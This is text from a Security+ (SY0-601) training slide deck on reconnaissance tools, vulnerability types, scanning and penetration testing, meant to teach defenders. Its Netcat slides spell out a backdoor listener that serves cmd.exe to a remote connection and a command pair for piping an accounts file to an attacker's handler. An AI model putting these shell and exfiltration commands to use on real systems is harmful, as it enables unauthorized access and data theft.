03- Performing Security Assessments

Ahmed Sultan
Senior Technical Instructor
ahmedsultan.me/about
1
Outlines

3.1- Assess Organizational Security with Network Reconnaissance Tools

3.2- Explain Security Concerns with General Vulnerability Types
3.3- Summarize Vulnerability Scanning Techniques
3.4- Explain Penetration Testing Concepts

Labs
Lab 1: Exploring the Lab Environment
Lab 2: Scanning and Identifying Network Nodes
Lab 3: Intercepting and Interpreting Network Traffic with Packet Sniffing Tools
Lab 4: Analyzing the Results of a Credentialed Vulnerability Scan

Security+ (SY0-601) © netriders.academy 2

3.1- Assess Organizational Security with Network Reconnaissance Tools
3.2- Explain Security Concerns with General Vulnerability Types
3.3- Summarize Vulnerability Scanning Techniques
3.4- Explain Penetration Testing Concepts

Security+ (SY0-601) © netriders.academy 3

IPCONFIG, PING, AND ARP

• The process of mapping out the attack surface is referred to as network

reconnaissance and discovery.
• Reconnaissance techniques are used by threat actors, but they can also be used
by security professionals to test their own security systems, as part of a security
assessment and ongoing monitoring.
• Topology discovery (or "footprinting") means scanning for hosts, IP ranges, and
routes between networks to map out the structure of the target network.
• Topology discovery can also be used to build an asset database and to identify
non-authorized hosts (rogue system detection) or network configuration errors.

Security+ (SY0-601) © netriders.academy 4

IPCONFIG, PING, AND ARP (cont.)

• Basic topology discovery tasks can be accomplished using the command line tools
built into Windows and Linux.
• The following tools report the IP configuration and test connectivity on the local
network segment or subnet:
✓ ipconfig—show the configuration assigned to network interface(s) in Windows.
✓ ifconfig—show the configuration assigned to network interface(s) in Linux.
✓ ping—probe a host on a particular IP address or host name using Internet Control Message
Protocol (ICMP), You can use ping with a simple script to perform a sweep of all the IP
addresses in a subnet.
✓ arp—display the local machine's Address Resolution Protocol (ARP) cache. The ARP cache
shows the MAC address of the interface associated with each IP address the local host has
communicated with recently.

Security+ (SY0-601) © netriders.academy 5

IPCONFIG, PING, AND ARP (cont.)

• For more information about commands, including syntax usage, look up the
command in an online resource for Windows (docs.microsoft.com/en-
us/windows-server/administration/windows-commands/windows-commands) or
Linux (linux.die.net/man).

• In Linux, commands such as ifconfig, arp, route, and traceroute are deprecated
and the utilities have not been updated for some years, The iproute2 suite of
tools supply replacements for these commands
(digitalocean.com/community/tutorials/how-to-use-iproute2-tools-to-manage-
network-configuration-on-a-linux-vps).

Security+ (SY0-601) © netriders.academy 6

ROUTE AND TRACEROUTE

• The following tools can be used to test the routing configuration and connectivity
with remote hosts and networks:
✓ route—view and configure the host's local routing table. Most end systems use a default
route to forward all traffic for remote networks via a gateway router.
✓ tracert—uses ICMP probes to report the round trip time (RTT) for hops between the local
host and a host on a remote network, tracert is the Windows version of the tool.
✓ traceroute—performs route discovery from a Linux host, traceroute uses UDP probes
rather than ICMP, by default.
✓ pathping—provides statistics for latency and packet loss along a route over a longer
measuring period, pathping is a Windows tool; the equivalent on Linux is mtr.

Security+ (SY0-601) © netriders.academy 7

IP SCANNERS AND NMAP

• Scanning a network using tools such as ping is time consuming and non-stealthy,
and does not return detailed results.
• Most topology discovery is performed using a dedicated IP scanner tool.
• An IP scanner performs host discovery and identifies how the hosts are
connected together in an internetwork.
• The Nmap Security Scanner (nmap.org) is one of the most popular open-source IP
scanners.
• Nmap can use diverse methods of host discovery, some of which can operate
stealthily and serve to defeat security mechanisms such as firewalls and intrusion
detection.

Security+ (SY0-601) © netriders.academy 8

IP SCANNERS AND NMAP (cont.)

• The tool is open-source software with packages for most versions of Windows,
Linux, and macOS, It can be operated with a command line or via a GUI (Zenmap).
• The basic syntax of an Nmap command is to give the IP subnet (or IP host
address) to scan.
• When used without switches like this, the default behavior of Nmap is to ping
and send a TCP ACK packet to ports 80 and 443 to determine whether a host is
present.
• On a local network segment, Nmap will also perform ARP and ND (Neighbor
Discovery) sweeps.
• If a host is detected, Nmap performs a port scan against that host to determine
which services it is running.

Security+ (SY0-601) © netriders.academy 9

IP SCANNERS AND NMAP (cont.)

Security+ (SY0-601) © netriders.academy 10

SERVICE DISCOVERY AND NMAP

• Having identified active IP hosts on the network and gained an idea of the
network topology, the next step in network reconnaissance is to work out which
operating systems are in use, which network services each host is running, and, if
possible, which application software is underpinning those services.
• This process is described as service discovery.
• Service discovery can also be used defensively, to probe potential rogue systems
and identify the presence of unauthorized network service ports.

Security+ (SY0-601) © netriders.academy 11

SERVICE DISCOVERY AND NMAP (cont.)

• When Nmap completes a host discovery scan, it will report on the state of each
port scanned for each IP address in the scope.
• At this point, you can run additional service discovery scans against one or more
of the active IP addresses.
• Some of the principal options for service discovery scans are:
✓ TCP SYN (-sS)—this is a fast technique also referred to as half-open scanning, as the scanning
host requests a connection without acknowledging it, The target's response to the scan's SYN
packet identifies the port state.
✓ UDP scans (-sU)—scan UDP ports, As these do not use ACKs, Nmap needs to wait for a
response or timeout to determine the port state, so UDP scanning can take a long time, A
UDP scan can be combined with a TCP scan.
✓ Port range (-p)—by default, Nmap scans 1000 commonly used ports, as listed in its
configuration file, Use the -p argument to specify a port range.

Security+ (SY0-601) © netriders.academy 12

SERVICE DISCOVERY AND NMAP (cont.)

Security+ (SY0-601) © netriders.academy 13

SERVICE DISCOVERY AND NMAP (cont.)

• The detailed analysis of services on a particular host is often called fingerprinting.

• This is because each OS or application software that underpins a network service
responds to probes in a unique way.
• This allows the scanning software to guess at the software name and version,
without having any sort of privileged access to the host.
• This can also be described as banner grabbing, where the banner is the header of
the response returned by the application.

Security+ (SY0-601) © netriders.academy 14

SERVICE DISCOVERY AND NMAP (cont.)

• When services are discovered, you can use Nmap with the -sV or -A switch to
probe a host more intensively to discover the following information:
✓ Protocol—do not assume that a port is being used for its "well known" application protocol.
Nmap can scan traffic to verify whether it matches the expected signature (HTTP, DNS, SMTP,
and so on).
✓ Application name and version—the software operating the port, such as Apache web server
or Internet Information Services (IIS) web server.
✓ OS type and version—use the -O switch to enable OS fingerprinting (or -A to use both OS
fingerprinting and version discovery).
✓ Device type—not all network devices are PCs, Nmap can identify switches and routers or
other types of networked devices, such as NAS boxes, printers, and webcams.

Security+ (SY0-601) © netriders.academy 15

SERVICE DISCOVERY AND NMAP (cont.)

Security+ (SY0-601) © netriders.academy 16

NETSTAT AND NSLOOKUP

• Basic service discovery tasks can also be performed using tools built into the
Windows and Linux operating systems:
✓ netstat—show the state of TCP/UDP ports on the local machine, The same command is
used on both Windows and Linux, though with different options syntax.

Security+ (SY0-601) © netriders.academy 17

NETSTAT AND NSLOOKUP (cont.)

• Basic service discovery tasks can also be performed using tools built into the
Windows and Linux operating systems (cont.)
✓ nslookup/dig—query name records for a given ___domain using a particular DNS resolver
under Windows (nslookup) or Linux (dig).

Security+ (SY0-601) © netriders.academy 18

OTHER RECONNAISSANCE AND DISCOVERY TOOLS

• There are hundreds of tools relevant to security assessments, network

reconnaissance, vulnerability scanning, and penetration testing.
• Security distributions specialize in bundling these tools:
✓ For Linux— KALI (kali.org) plus ParrotOS (parrotlinux.org)—and
✓ For Windows— (fireeye.com/blog/threat-research/2019/03/commando-vm-windows-
offensive-distribution.html).

Security+ (SY0-601) © netriders.academy 19

OTHER RECONNAISSANCE AND DISCOVERY TOOLS (cont.)

• theHarvester
✓ theHarvester is a tool for gathering open-source intelligence (OSINT) for a particular ___domain
or company name (github.com/laramies/theHarvester).
✓ It works by scanning multiple public data sources to gather emails, names, subdomains, IPs,
URLs and other relevant data.

• dnsenum
✓ While you can use tools such as dig and whois to query name records and hosting details and
to check that external DNS services are not leaking too much information.
✓ a tool such as dnsenum packages a number of tests into a single query
(github.com/fwaeytens/dnsenum).
✓ As well as hosting information and name records, dnsenum can try to work out the IP address
ranges that are in use.

Security+ (SY0-601) © netriders.academy 20

OTHER RECONNAISSANCE AND DISCOVERY TOOLS (cont.)

• scanless
✓ Port scanning is difficult to conceal from detection systems, unless it is performed slowly and
results are gathered over an extended period.
✓ Another option is to disguise the source of probes, To that end, scanless is a tool that uses
third-party sites (github.com/vesche/scanless).
✓ This sort of tool is also useful in a defensive sense, by scanning for ports and services that are
open but shouldn't be.

• curl
✓ curl is a command line client for performing data transfers over many types of protocol, This
tool can be used to submit HTTP GET, POST, and PUT requests as part of web application
vulnerability testing, curl supports many other data transfer protocols, including FTP, IMAP,
LDAP, POP3, SMB, and SMTP.

Security+ (SY0-601) © netriders.academy 21

OTHER RECONNAISSANCE AND DISCOVERY TOOLS (cont.)

• Nessus
✓ The list of services and version information that a host is running can be cross-checked
against lists of known software vulnerabilities, This type of scanning is usually performed
using automated tools.
✓ Nessus, produced by Tenable Network Security (tenable.com/products/nessus/nessus-
professional), is one of the best-known commercial vulnerability scanners.
✓ It is available in on-premises (Nessus Manager) and cloud (Tenable Cloud) versions, as well as
a Nessus Professional version, designed for smaller networks.
✓ The product is free to use for home users but paid for on a subscription basis for enterprises.
✓ As a previously open-source program, Nessus also supplies the source code for many other
scanners.

Security+ (SY0-601) © netriders.academy 22

Lab

Lab 1: Exploring the Lab Environment

Lab 2: Scanning and Identifying Network Nodes

Security+ (SY0-601) © netriders.academy 23

PACKET CAPTURE AND TCPDUMP

• Packet and protocol analysis depends on a sniffer tool to capture and decode the
frames of data.
• Network traffic can be captured from a host or from a network segment.
• Using a host means that only traffic directed at that host is captured.
• Capturing from a network segment can be performed by a switched port
analyzer (SPAN) port (or mirror port).
• This means that a network switch is configured to copy frames passing over
designated source ports to a destination port, which the packet sniffer is
connected to.

Security+ (SY0-601) © netriders.academy 24

PACKET CAPTURE AND TCPDUMP (cont.)

• Sniffing can also be performed over a network cable segment by using a test
access port (TAP).
• This means that a device is inserted in the cabling to copy frames passing over it.
• Typically, sniffers are placed inside a firewall or close to a server of particular
importance.
• The idea is usually to identify malicious traffic that has managed to get past the
firewall.
• A single sniffer can generate an exceptionally large amount of data, so you cannot
just put multiple sensors everywhere in the network without provisioning the
resources to manage them properly.
• Depending on network size and resources, one or just a few sensors will be
deployed to monitor key assets or network paths.

Security+ (SY0-601) © netriders.academy 25

PACKET CAPTURE AND TCPDUMP (cont.)

• tcpdump
✓ is a command line packet capture utility for Linux (linux.die.net/man/8/tcpdump).
✓ The basic syntax of the command is tcpdump -i eth0, where eth0 is the interface to listen
on.
✓ The utility will then display captured packets until halted manually (Ctrl+C).
✓ Frames can be saved to a .pcap file using the -w option.
✓ Alternatively, you can open a pcap file using the -r option.

Security+ (SY0-601) © netriders.academy 26

PACKET CAPTURE AND TCPDUMP (cont.)

• tcpdump is often used with some sort of filter expression to reduce the number
of frames that are captured:
✓ Type—filter by host, net, port, or portrange.
✓ Direction—filter by source (src) or destination (dst) parameters (host, network, or port).
✓ Protocol—filter by a named protocol rather than port number (for example, arp, icmp, ip,
ip6, tcp, udp, and so on).
✓ and (&&)
✓ or (||)
✓ not (!)

For Example:
tcpdump -i eth0 "src host 10.1.0.100 and (dst port 53 or dst port 80)"

Security+ (SY0-601) © netriders.academy 27

PACKET ANALYSIS AND WIRESHARK

• A protocol analyzer (or packet analyzer) works in conjunction with a sniffer to

perform traffic analysis.
• You can either analyze a live capture or open a saved capture (.pcap) file.
• Protocol analyzers can decode a captured frame to reveal its contents in a
readable format.
• You can choose to view a summary of the frame or choose a more detailed view
that provides information on the OSI layer, protocol, function, and data.

Security+ (SY0-601) © netriders.academy 28

PACKET ANALYSIS AND WIRESHARK (cont.)

• Wireshark (wireshark.org) is an open-source graphical packet capture and

analysis utility, with installer packages for most operating systems.
• Having chosen the interface to listen on, the output is displayed in a three-pane
view:
✓ The packet list pane shows a scrolling summary of frames.
✓ The packet details pane shows expandable fields in the frame currently selected from the
packet list.
✓ The packet bytes pane shows the raw data from the frame in hex and ASCII, Wireshark is
capable of parsing (interpreting) the headers and payloads of hundreds of network protocols.

Security+ (SY0-601) © netriders.academy 29

PACKET ANALYSIS AND WIRESHARK (cont.)

• You can apply a capture filter using the same expression syntax as tcpdump
(though the expression can be built via the GUI tools too).
• You can save the output to a .pcap file or load a file for analysis.
• Wireshark supports very powerful display filters
(wiki.wireshark.org/DisplayFilters) that can be applied to a live capture or to a
capture file.
• You can also adjust the coloring rules (wiki.wireshark.org/ColoringRules), which
control the row shading and font color for each frame.
• Another useful option is to use the Follow TCP Stream context command to
reconstruct the packet contents for a TCP session.

Security+ (SY0-601) © netriders.academy 30

PACKET ANALYSIS AND WIRESHARK (cont.)

Security+ (SY0-601) © netriders.academy 31

PACKET INJECTION AND REPLAY

• Some reconnaissance techniques and tests depend on sending forged or spoofed

network traffic.
• Often, network sniffing software libraries allow frames to be inserted (or
injected) into the network stream.
• There are also tools that allow for different kinds of packets to be crafted and
manipulated.
• Well-known tools used for packet injection include:
✓ Dsniff (monkey.org/~dugsong/dsniff)
✓ Ettercap (ettercap-project.org)
✓ Scapy (scapy.net)
✓ hping (hping.org)

Security+ (SY0-601) © netriders.academy 32

PACKET INJECTION AND REPLAY (cont.)

hping
• is an open-source spoofing tool that provides a penetration tester with the ability to craft
network packets to exploit vulnerable firewalls and IDSs, hping can perform the following
types of test:
✓ Host/port detection and firewall testing—like Nmap, hping can be used to probe IP addresses
and TCP/UDP ports for responses.
✓ Traceroute—if ICMP is blocked on a local network, hping offers alternative ways of mapping
out network routes, hping can use arbitrary packet formats, such as probing DNS ports using
TCP or UDP, to perform traces.
✓ Denial of service (DoS)—hping can be used to perform flood-based DoS attacks from
randomized source Ips, This can be used in a test environment to determine how well a
firewall, IDS, or load balancer responds to such attacks.

Security+ (SY0-601) © netriders.academy 33

PACKET INJECTION AND REPLAY (cont.)

tcpreplay
• As the name suggests, tcpreplay takes previously captured traffic that has been saved to
a .pcap file and replays it through a network interface (linux.die.net/man/1/tcpreplay).
• Optionally, fields in the capture can be changed, such as substituting MAC or IP
addresses.
• tcpreplay is useful for analysis purposes.
• If you have captured suspect traffic, you can replay it through a monitored network
interface to test intrusion detection rules.

Security+ (SY0-601) © netriders.academy 34

EXPLOITATION FRAMEWORKS

• A remote access trojan (RAT) is malware that gives an adversary the means of
remotely accessing the network.
• From the perspective of security posture assessment, a penetration tester might
want to try to establish this sort of connection and attempt to send corporate
information over the channel (data exfiltration).
• If security controls are working properly, this attempt should be defeated (or at
least detected).

Security+ (SY0-601) © netriders.academy 35

EXPLOITATION FRAMEWORKS (cont.)

• An exploitation framework uses the vulnerabilities identified by an automated

scanner and launches scripts or software to attempt to deliver matching exploits.
• This might involve considerable disruption to the target, including service failure,
and risk data security.
• The framework comprises a database of exploit code, each targeting a particular
CVE (Common Vulnerabilities and Exposures).
• The exploit code can be coupled with modular payloads.
• Depending on the access obtained via the exploit, the payload code may be used
to open a command shell, create a user, install software, and so on.

Security+ (SY0-601) © netriders.academy 36

EXPLOITATION FRAMEWORKS (cont.)

• The custom exploit module can then be injected into the target system.
• The framework may also be able to obfuscate the code so that it can be injected
past an intrusion detection system or antivirus software.
• The best-known exploit framework is Metasploit (metasploit.com).
• The platform is open-source software, now maintained by Rapid7.
• There is a free framework (command line) community edition with installation
packages for Linux and Windows.
• Rapid7 produces pro and express commercial editions of the framework and it
can be closely integrated with the Nexpose vulnerability scanner.

Security+ (SY0-601) © netriders.academy 37

EXPLOITATION FRAMEWORKS (cont.)

Security+ (SY0-601) © netriders.academy 38

NETCAT

• One simple but effective tool for testing connectivity is Netcat (nc), available for
both Windows and Linux.
• Netcat can be used for port scanning and fingerprinting.
• For example, the following command attempts to connect to the HTTP port on a
server and return any banner by sending the "head" HTTP keyword:

echo "head" | nc 10.1.0.1 -v 80

Security+ (SY0-601) © netriders.academy 39

NETCAT (cont.)

• Netcat can also establish connections with remote machines.

• To configure Netcat as a backdoor, you first set up a listener on the victim system
(IP 10.1.0.1) set to pipe traffic from a program, such as the command interpreter,
to its handler:
nc -l -p 666 -e cmd.exe

• The following command connects to the listener and grants access to the
terminal:

nc 10.1.0.1 666

Security+ (SY0-601) © netriders.academy 40

NETCAT (cont.)

• Used the other way around, Netcat can be used to receive files.
• For example, on the target system the attacker runs the following:

type accounts.sql | nc 10.1.0.192 6666

• On the handler (IP 10.1.0.192), the attacker receives the file using the following
command:

nc -l -p 6666 > accounts.sql

Security+ (SY0-601) © netriders.academy 41

Lab

Lab 3: Intercepting and Interpreting Network Traffic with Packet Sniffing Tools

Security+ (SY0-601) © netriders.academy 42

3.1- Assess Organizational Security with Network Reconnaissance Tools
3.2- Explain Security Concerns with General Vulnerability Types
3.3- Summarize Vulnerability Scanning Techniques
3.4- Explain Penetration Testing Concepts

Security+ (SY0-601) © netriders.academy 43

SOFTWARE VULNERABILITIES AND PATCH MANAGEMENT

• Software exploitation means an attack that targets a vulnerability in software

code.
• An application vulnerability is a design flaw that can cause the security system to
be circumvented or that will cause the application to crash.
• It is also important to realize that software vulnerabilities affect all types of code,
not just applications:
✓ Operating system (OS)— A vulnerability in an OS kernel file or shared library is more likely to
allow privilege escalation, where the malware code runs with higher access rights (system or
root).
✓ Firmware—vulnerabilities can exist in the BIOS/UEFI firmware that controls the boot process
for PCs.

Security+ (SY0-601) © netriders.academy 44

ZERO-DAY AND LEGACY PLATFORM VULNERABILITIES

• Zero-Day is a vulnerability that is exploited before the developer knows about it

or can release a patch.
• A legacy platform is one that is no longer supported with security patches by its
developer or vendor.
• This could be a PC/laptop/smartphone, networking appliance, peripheral device,
Internet of Things device, operating system, database/programming
environment, or software application.
• By definition, legacy platforms are unpatchable.
• Such systems are highly likely to be vulnerable to exploits and must be protected
by security controls other than patching, such as isolating them to networks that
an attacker cannot physically connect to.

Security+ (SY0-601) © netriders.academy 45

WEAK HOST CONFIGURATIONS

Default Settings
✓Relying on the manufacturer default settings when deploying an appliance or software
applications is one example of weak configuration.
✓It is not sufficient to rely on the vendor to ship products in a default-secure
configuration, though many now do.
✓Default settings may leave unsecure interfaces enabled that allow an attacker to
compromise the device.
✓Network appliances with weak settings can allow attackers to move through the network
unhindered and snoop on traffic.

Security+ (SY0-601) © netriders.academy 46

WEAK HOST CONFIGURATIONS (cont.)

Unsecured Root Accounts

✓The root account, referred to as the default Administrator account in Windows or
generically as the superuser, has no restrictions set over system access.
✓A superuser account is used to install the OS.
✓An unsecured root account is one that an adversary is able to gain control of, either by
guessing a weak password or by using some local boot attack to set or change the
password.

Security+ (SY0-601) © netriders.academy 47

WEAK HOST CONFIGURATIONS (cont.)

Open Permissions
✓Open permissions refers to provisioning data files or applications without differentiating
access rights for user groups.
✓Permissions systems can be complex and it is easy to make mistakes, such as permitting
unauthenticated guests to view confidential data files, or allowing write access when
only read access is appropriate.

Security+ (SY0-601) © netriders.academy 48

WEAK NETWORK CONFIGURATIONS

Open Ports and Services

✓Network applications and services allow client connections via Transport Control Protocol
(TCP) or User Datagram Protocol (UDP) port numbers.
✓The clients and servers are identified by Internet Protocol (IP) addresses.
✓Servers must operate with at least some open ports, but security best practice dictates
that these should be restricted to only necessary services.
✓Running unnecessary open ports and services increases the attack surface.
✓Some generic steps to harden services to meet a given role include:
➢ Restrict endpoints that are allowed to access the service by IP address or address range.
➢ Disable services that are installed by default but that are not needed.

Security+ (SY0-601) © netriders.academy 49

WEAK NETWORK CONFIGURATIONS (cont.)

Unsecure Protocols
✓An unsecure protocol is one that transfers data as cleartext; that is, the protocol does not
use encryption for data protection.
✓Lack of encryption also means that there is no secure way to authenticate the endpoints.
✓This allows an attacker to intercept and modify communications, acting as man-in-the-
middle (MITM).

Security+ (SY0-601) © netriders.academy 50

WEAK NETWORK CONFIGURATIONS (cont.)

Weak Encryption
✓Encryption algorithms protect data when it is stored on disk or transferred over a
network.
✓Encrypted data should only be accessible to someone with the correct decryption key.
✓Weak encryption vulnerabilities allow unauthorized access to data.

Security+ (SY0-601) © netriders.academy 51

WEAK NETWORK CONFIGURATIONS (cont.)

Errors
✓Weakly configured applications may display unformatted error messages under certain
conditions.
✓These error messages can be revealing to threat actors probing for vulnerabilities and
coding mistakes.
✓Secure coding practices should ensure that if an application fails, it does so "gracefully"
without revealing information that could assist the development of an exploit.

Security+ (SY0-601) © netriders.academy 52

IMPACTS FROM VULNERABILITIES

Data Breaches and Data Exfiltration Impacts

✓All information should be collected, stored, and processed by authenticated users and
hosts subject to the permissions (authorization) allocated to them by the data owner.
✓Data breach and data exfiltration describe two types of event where unauthorized
information use occurs:
➢ A data breach event is where confidential data is read, transferred, modified, or deleted
without authorization.
➢ Data exfiltration is the methods and tools by which an attacker transfers data without
authorization from the victim's systems to an external network or media.

Security+ (SY0-601) © netriders.academy 53

IMPACTS FROM VULNERABILITIES (cont.)

Identity Theft Impacts

✓A privacy breach may allow the threat actor to perform identity theft or to sell the data
to other malicious actors.
✓The threat actor may obtain account credentials or might be able to use personal details
and financial information to make fraudulent credit applications and purchases.

Financial and Reputation Impacts

✓All these impacts can have direct financial impacts due to damages, fines, and loss of
business.
✓Data/privacy breach and availability loss events will also cause a company's reputation to
drop with direct customers.

Security+ (SY0-601) © netriders.academy 54

3.1- Assess Organizational Security with Network Reconnaissance Tools
3.2- Explain Security Concerns with General Vulnerability Types
3.3- Summarize Vulnerability Scanning Techniques
3.4- Explain Penetration Testing Concepts

Security+ (SY0-601) © netriders.academy 55

VULNERABILITY SCAN TYPES

1. Network Vulnerability Scanner

✓A network vulnerability scanner, such as Tenable Nessus (tenable.com/products/nessus)
or OpenVAS (openvas.org), is designed to test network hosts, including client PCs, mobile
devices, servers, routers, and switches.
✓It examines an organization's on-premises systems, applications, and devices and
compares the scan results to configuration templates plus lists of known vulnerabilities.
✓Typical results from a vulnerability assessment will identify missing patches, deviations
from baseline configuration templates, and other related vulnerabilities.

Security+ (SY0-601) © netriders.academy 56

VULNERABILITY SCAN TYPES (cont.)

Security+ (SY0-601) © netriders.academy 57

VULNERABILITY SCAN TYPES (cont.)

• The first phase of scanning might be to run a detection scan to discover hosts on
a particular IP subnet.
• In the next phase of scanning, a target range of hosts is probed to detect running
services, patch level, security configuration and policies, network shares, unused
accounts, weak passwords, antivirus configuration, and so on.
• Each scanner is configured with a database of known software and configuration
vulnerabilities.
• The tool compiles a report about each vulnerability in its database that was found
to be present on each host.
• Each identified vulnerability is categorized and assigned an impact warning.

Security+ (SY0-601) © netriders.academy 58

VULNERABILITY SCAN TYPES (cont.)

• Most tools also suggest remediation techniques.

• This information is highly sensitive, so use of these tools and the distribution of
the reports produced should be restricted to authorized hosts and user accounts.
• Network vulnerability scanners are configured with information about known
vulnerabilities and configuration weaknesses for typical network hosts.
• These scanners will be able to test common operating systems, desktop
applications, and some server applications.
• This is useful for general purpose scanning, but some types of applications might
need more rigorous analysis.

Security+ (SY0-601) © netriders.academy 59

VULNERABILITY SCAN TYPES (cont.)

2. Application and Web Application Scanners

✓A dedicated application scanner is configured with more detailed and specific scripts to
test for known attacks, as well as scanning for missing patches and weak configurations.
✓The best known class of application scanners are web application scanners.
✓Tools such as Nikto (cirt.net/Nikto2) look for known web exploits, such as SQL injection
and cross-site scripting (XSS), and may also analyze source code and database security to
detect unsecure programming practices.
✓Other types of application scanner would be optimized for a particular class of software,
such as a database server.

Security+ (SY0-601) © netriders.academy 60

COMMON VULNERABILITIES AND EXPOSURES

• An automated scanner needs to be kept up to date with information about

known vulnerabilities.
• This information is often described as a vulnerability feed, though the Nessus
tool refers to these feeds as plug-ins, and OpenVAS refers to them as network
vulnerability tests (NVTs).
• Often, the vulnerability feed forms an important part of scan vendors'
commercial models, as the latest updates require a valid subscription to acquire.

Security+ (SY0-601) © netriders.academy 61

COMMON VULNERABILITIES AND EXPOSURES (cont.)

• Vulnerability feeds make use of common identifiers to facilitate sharing of

intelligence data across different platforms.
• Many vulnerability scanners use the Secure Content Automation Protocol (SCAP)
to obtain feed or plug-in updates (scap.nist.gov).
• As well as providing a mechanism for distributing the feed, SCAP defines ways to
compare the actual configuration of a system to a target-secure baseline plus
various systems of common identifiers.
• These identifiers supply a standard means for different products to refer to a
vulnerability or platform consistently.

Security+ (SY0-601) © netriders.academy 62

COMMON VULNERABILITIES AND EXPOSURES (cont.)

• Common Vulnerabilities and Exposures (CVE) is a dictionary of vulnerabilities in

published operating systems and applications software (cve.mitre.org).
• There are several elements that make up a vulnerability's entry in the CVE:
✓ An identifier in the format: CVE-YYYY-####, where YYYY is the year the vulnerability was
discovered, and #### is at least four digits that indicate the order in which the vulnerability
was discovered.
✓ A brief description of the vulnerability.
✓ A reference list of URLs that supply more information on the vulnerability.
✓ The date the vulnerability entry was created.

Security+ (SY0-601) © netriders.academy 63

COMMON VULNERABILITIES AND EXPOSURES (cont.)

• The NVD supplements the CVE descriptions with additional analysis, a criticality
metric, calculated using the Common Vulnerability Scoring System (CVSS), plus
fix information.
• CVSS metrics generate a score from 0 to 10 based on characteristics of the
vulnerability, such as whether it can be triggered remotely or needs local access,
whether user intervention is required, and so on.

Score Description
0.1+ Low
4.0+ Medium
7.0+ High
9.0+ Critical

Security+ (SY0-601) © netriders.academy 64

CREDENTIALED VERSUS NON-CREDENTIALED SCANNING

• A non-credentialed scan is one that proceeds by directing test packets at a host

without being able to log on to the OS or application.
• The view obtained is the one that the host exposes to an unprivileged user on the
network.
• The test routines may be able to include things such as using default passwords
for service accounts and device management interfaces, but they are not given
privileged access.
• Sometimes you will want to narrow your focus to think like an attacker who
doesn't have specific high-level permissions or total administrative access.
• Non-credentialed scanning is often the most appropriate technique for external
assessment of the network perimeter or when performing web application
scanning.

Security+ (SY0-601) © netriders.academy 65

CREDENTIALED VERSUS NON-CREDENTIALED SCANNING
(cont.)
• A credentialed scan is given a user account with logon rights to various hosts,
plus whatever other permissions are appropriate for the testing routines.
• This sort of test allows much more in-depth analysis, especially in detecting when
applications or security settings may be misconfigured.
• It also shows what an insider attack, or one where the attacker has compromised
a user account, may be able to achieve.

Security+ (SY0-601) © netriders.academy 66

CREDENTIALED VERSUS NON-CREDENTIALED SCANNING
(cont.)
• A credentialed scan is given a user account with logon rights to various hosts,
plus whatever other permissions are appropriate for the testing routines.
• This sort of test allows much more in-depth analysis, especially in detecting when
applications or security settings may be misconfigured.
• It also shows what an insider attack, or one where the attacker has compromised
a user account, may be able to achieve.

Security+ (SY0-601) © netriders.academy 67

Lab

Lab 4: Analyzing the Results of a Credentialed Vulnerability Scan

Security+ (SY0-601) © netriders.academy 68

3.1- Assess Organizational Security with Network Reconnaissance Tools
3.2- Explain Security Concerns with General Vulnerability Types
3.3- Summarize Vulnerability Scanning Techniques
3.4- Explain Penetration Testing Concepts

Security+ (SY0-601) © netriders.academy 69

PENETRATION TESTING

• A penetration test—often shortened to pen test—uses authorized hacking

techniques to discover exploitable weaknesses in the target's security systems.
• Pen testing is also referred to as ethical hacking.
• A pen test might involve the following steps:
✓Verify a threat exists
✓Bypass security controls
✓Actively test security controls
✓Exploit vulnerabilities

Security+ (SY0-601) © netriders.academy 70

RULES OF ENGAGEMENT

• Security assessments might be performed by employees or may be contracted to

consultants or other third parties.
• Rules of engagement specify what activity is permitted or not permitted.
• These rules should be made explicit in a contractual agreement.
• For example: a pen test should have a concrete objective and scope rather than a
vague type of "Break into the network" aim.
• There may be systems and data that the penetration tester should not attempt to
access or exploit.

Security+ (SY0-601) © netriders.academy 71

Attack Profile

• Attacks come from different sources and motivations.

• You may wish to test both resistance to external (targeted and untargeted) and
insider threats.
• You need to determine how much information about the network to provide to
the consultant:
✓Black box
✓White box
✓Gray box

Security+ (SY0-601) © netriders.academy 72

Attack Profile (cont.)

1. Black box
✓(or unknown environment)—the consultant is given no privileged information about the
network and its security systems.
✓This type of test would require the tester to perform a reconnaissance phase.
✓Black box tests are useful for simulating the behavior of an external threat.

Security+ (SY0-601) © netriders.academy 73

Attack Profile (cont.)

2. White box
✓(or known environment)—the consultant is given complete access to information about
the network.
✓This type of test is sometimes conducted as a follow-up to a black box test to fully
evaluate flaws discovered during the black box test.
✓The tester skips the reconnaissance phase in this type of test.
✓White box tests are useful for simulating the behavior of a privileged insider threat.

Security+ (SY0-601) © netriders.academy 74

Attack Profile (cont.)

3. Gray box
✓(or partially known environment)—the consultant is given some information.
✓typically, this would resemble the knowledge of junior or non-IT staff to model particular
types of insider threats.
✓This type of test requires partial reconnaissance on the part of the tester.
✓Gray box tests are useful for simulating the behavior of an unprivileged insider threat.

Security+ (SY0-601) © netriders.academy 75

Bug Bounty

• A bug bounty is a program operated by a software vendor or website operator

where rewards are given for reporting vulnerabilities.
• Where a pen test is performed on a contractual basis, costed by the consultant, a
bug bounty program is a way of crowd sourcing detection of vulnerabilities.
• Some bug bounties are operated as internal programs, with rewards for
employees only.
• Most are open to public submissions (tripwire.com/state-of-security/security-
data-protection/cyber-security/essential-bug-bounty-programs).

Security+ (SY0-601) © netriders.academy 76

EXERCISE TYPES

• Some of the techniques used in penetration testing may also be employed as an

exercise between two competing teams:
✓Red team—performs the offensive role to try to infiltrate the target.
✓Blue team—performs the defensive role by operating monitoring and alerting
controls to detect and prevent the infiltration.

Security+ (SY0-601) © netriders.academy 77

EXERCISE TYPES (cont.)

Security+ (SY0-601) © netriders.academy 78